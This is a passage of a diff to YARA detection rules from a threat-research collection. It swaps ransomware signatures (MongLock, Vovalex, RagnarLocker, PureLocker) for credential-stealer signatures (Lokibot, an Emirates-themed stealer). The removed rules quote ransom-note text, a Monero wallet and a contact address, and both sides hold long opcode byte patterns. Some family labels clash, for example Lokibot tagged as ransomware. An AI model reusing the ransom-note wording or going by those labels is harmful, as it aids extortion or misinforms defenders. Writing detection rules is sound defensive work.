-		logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984"
+		logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "STEALER"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/MongLock"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/CredStealer"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8"
 
 	strings:
-		$x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide
-		$s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii
-		$s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii
-		$s3 = "No valid port number in connect to host string (%s)" fullword ascii
-		$s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii
-		$s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii
-		$s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii
-		$s7 = "detail may be available in the Windows System event log." fullword ascii
-		$s8 = "Found bundle for host %s: %p [%s]" fullword ascii
-		$s9 = "No valid port number in proxy string (%s)" fullword ascii
-		$op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 }
-		$op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 }
-		$op2 = { c7 41 0c df ff ff ff c7 41 10 }
+		$my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide
+		$my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		$my_hex_string and $my_hex_string2
 }
-rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE
+rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE
 {
 	meta:
-		description = "Vovalex ransomware detection part 2"
-		author = "CB @ ATR"
-		id = "26c91d06-13da-5039-8b8a-eb8de2774d79"
-		date = "2021-02-01"
-		modified = "2021-02-01"
+		description = "Rule to detect Lokibot stealer"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7"
+		date = "2020-09-23"
+		modified = "2020-09-25"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Vovalex1.yar#L3-L42"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "82814fd9155ec910c6353de8336733704e05c9f02409ad99cd80da8ef9fe3c04"
-		score = 75
-		quality = 64
-		tags = "RANSOM, FILE"
-		malware_type = "Ransom"
-		malware_family = "Ransom:Win/Vovalex"
-		hash1 = "0604acc15196120db2f4ca922feb2a4c858a46123cb26e9af2ef97b4c7839121"
-		hash2 = "fe9ff27ec0a1a48cbb8bc043f260a656c221c6c61704187a390bc8da6f91103a"
-		hash3 = "3b198c367aca1d239abc48bdeb8caabf9b8f2b630071b8e0fd1e86940eab14d6"
-
-	strings:
-		$x1 = "If you don't know where to buy Monero - visit these websites: https://www.bestchange.ru/ https://www.bestchange.com" fullword ascii
-		$s2 = "Full list: https://www.getmonero.org/community/merchants/#exchanges" fullword ascii
-		$s3 = ": https://www.getmonero.org/community/merchants/#exchanges" fullword ascii
-		$s4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" fullword ascii
-		$s5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" fullword ascii
-		$s6 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" fullword ascii
-		$s7 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" fullword ascii
-		$s8 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\random.d" fullword ascii
-		$s9 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\conv.d" fullword ascii
-		$s10 = "3. If everything is good, you will receive the decryptor." fullword ascii
-		$s11 = "Attempting to flush() in an unopened file" fullword ascii
-		$s12 = "Monero: 4B45W7V1sJAZBnPSnvcipa5k7BRyC4w8GCTfQCUL2XRx5CFzG3iJtEk2kqEvFbF7FagEafRYFfQ6FJnZmep5TsnrSfxpMkS" fullword ascii
-		$s13 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\padding.d" fullword ascii
-		$s14 = "crypto.aes.AES!(4u, 8u, 14u).AES" fullword ascii
-		$s15 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\aes.d" fullword ascii
-		$s16 = "Monero - " fullword ascii
-		$s17 = "std.random.uniform(): invalid bounding interval " fullword ascii
-		$s18 = "crypto.aes.AESUtils" fullword ascii
-		$s19 = "2. Send us a mail with proofs of transaction: VovanAndLexus@cock.li" fullword ascii
-		$s20 = "crypto.aes" fullword ascii
-		$op0 = { 48 8d 8d 10 ff ff ff e8 4a 22 fe ff f7 df 89 bd }
-		$op1 = { e8 60 6e fb ff 34 01 75 d6 4c 8b 46 40 48 8b 56 }
-		$op2 = { 4c 8d 85 40 ff ff ff 4c 8d 15 d2 78 02 00 4c 89 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
-}
-
-rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect RagnarLocker samples"
-		author = "McAfee ATR Team"
-		id = "58874f27-3070-52c9-bd96-337fdaa4499b"
-		date = "2020-04-15"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ragnarlocker.yar#L3-L45"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_Lokibot.yar#L1-L39"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c"
-		logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912"
+		logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510"
 		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "STEALER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/RagnarLocker"
+		malware_type = "stealer"
+		malware_family = "Ransomware:W32/Lokibot"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2"
+		hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d"
+		hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84"
 
 	strings:
-		$s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D}
-		$s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 }
-		$s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 }
-		$s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 }
-		$s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 }
-		$op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 }
-		$p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 }
-		$p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 }
-		$bp0 = { e8 b7 d2 ff ff ff b6 84 }
-		$bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff }
-		$bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 }
+		$sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 }
+		$sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 }
+		$sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 }
+		$sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 }
+		$sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 }
+		$sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 }
+		$sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 }
+		$sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 }
+		$sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 }
+		$sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 }
+		$sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 }
+		$sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 }
+		$sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 4 of ( $s* ) and $op1 ) or all of ( $p* ) and pe.imphash ( ) == "9f611945f0fe0109fe728f39aad47024" or all of ( $bp* ) and pe.imphash ( ) == "489a2424d7a14a26bfcfb006de3cd226"
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER
 {
 	meta:
-		description = "Rule to detect PureLocker ransomware based on binary sequences"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3d945869-9faa-59de-add6-d664a7beef6f"
-		date = "2019-11-13"
+		description = "Credentials Stealing Attack"
+		author = "Christiaan Beek | McAfee ATR Team"
+		id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5"
+		date = "2013-06-30"
 		modified = "2020-08-14"
-		reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_PureLocker.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_EmiratesStatement.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea"
+		hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57"
+		logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 45
+		tags = "STEALER"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/PureLocker"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/DarkSide"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E